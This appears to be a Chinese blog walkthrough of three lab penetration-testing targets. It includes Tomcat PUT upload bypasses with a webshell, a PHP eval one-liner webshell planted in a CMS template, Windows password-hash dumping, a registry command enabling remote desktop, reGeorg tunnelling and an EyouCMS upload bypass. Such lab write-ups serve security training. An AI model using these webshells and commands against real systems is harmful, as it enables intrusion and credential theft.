【无标题】qax靶场搭建

第一个

172.168.20.167

首先环境搭建

docker-compose build

docker-compose up -d

运行完成后访问 http://172.168.20.167:8080 即可看到Tomcat的Example页面。

三种上传绕过方式:

  1. 第一个:PUT /xxx.jsp%20
  2. 第二个:PUT /xxx.jsp::$DATA
  3. 第三个为:PUT /xxx.jsp/

然后我们用exp来验证一下是否存在漏洞

以put方式写入222.jsp,然后就是我的ip地址要对应上

看到返回响应码400,说明失败了,重新检查,直到看到204,说明成功了

构造一个payload看看是否真的能够执行
http://172.168.20.167:8080/222.jsp?pwd=023&cmd=whoamihttp://172.168.20.167:8080/222.jsp?pwd=023&cmd=whoami

既然已经验证完能够上传,那让我们上传个jsp一句话木马获取权限。这里我用的是哥斯拉生成的一句话木马。写入的地方就是Content-Length: 537以下的地方,在那里插shell。

然后用哥斯拉连接看看就表示成功了

第二个

http://172.168.20.217/

首先打开网址界面如下:

点击登录,进行用户登录:

渗透过程

  1. 获取webshell

在r=后输入admin找到后台登录页面

(2)输入账号密码登录后台

(3)点击管理模板文件

(4)编辑index_index.php文件

(5)在头部添加<?php @eval($_REQUEST[666]);?>一句话木马,保存

(6)在主页url后加?666=phpinfo();成功显示

(7)然后用蚁剑连接,获取更多权限

8上传QuarksPwDump.exe,
在终端输入C:\phpStudy2013\WWW\QuarksPwDump.exe --dump-hash-local获取密码

  1. 通过cmd5解码,账户名:Administrator 密码:Hallo
  2. 接下来尝试远程登录。

首先在终端输入netstat -ano,发现3389端口未开启。

开启3386端口命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

10尝试远程登录。

  1. 通过上面破解的账号密码,远程登录
  2. 拿到flag1

进入外网后,收集有用信息。

结果发现xshell4新建会话有IP 和用户名。

尝试ping一下这个ip,可以ping通。

接下来尝试爆破密码。

通过蚁剑往win上传reGeorg-master/tunnel.nosocker.php

物理机访问 http://192.168.100.130/tunnel.nosocher.php

  1. 接下来打开kali,运行reGeorg-master

第三个

172.168.20.208

(1)打开界面:

(2)打开待测试的EyouCMS网站,在登录页面输入正确的账户名和密码,登录到后台管理界面。

(3)然后开启burp抓包,构建如下的包
需要改两方面的参数一是referer,改成我们访问的页面
然后将get的url构造为如下

  1. 使用BP,拦截一次文件上传请求,并将该请求保存至本地,将其中的上传文件名修改为"test.php"。

(5)修改请求头中的Content-Type参数为"1.jpg",并重新发送该请求。

  1. 在服务器端检查上传目录下是否出现了名为"test.php"的文件。

(7)文件上传成功后,验证漏洞是否存在。

(8)然后放进sqlmap一把梭就行啦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值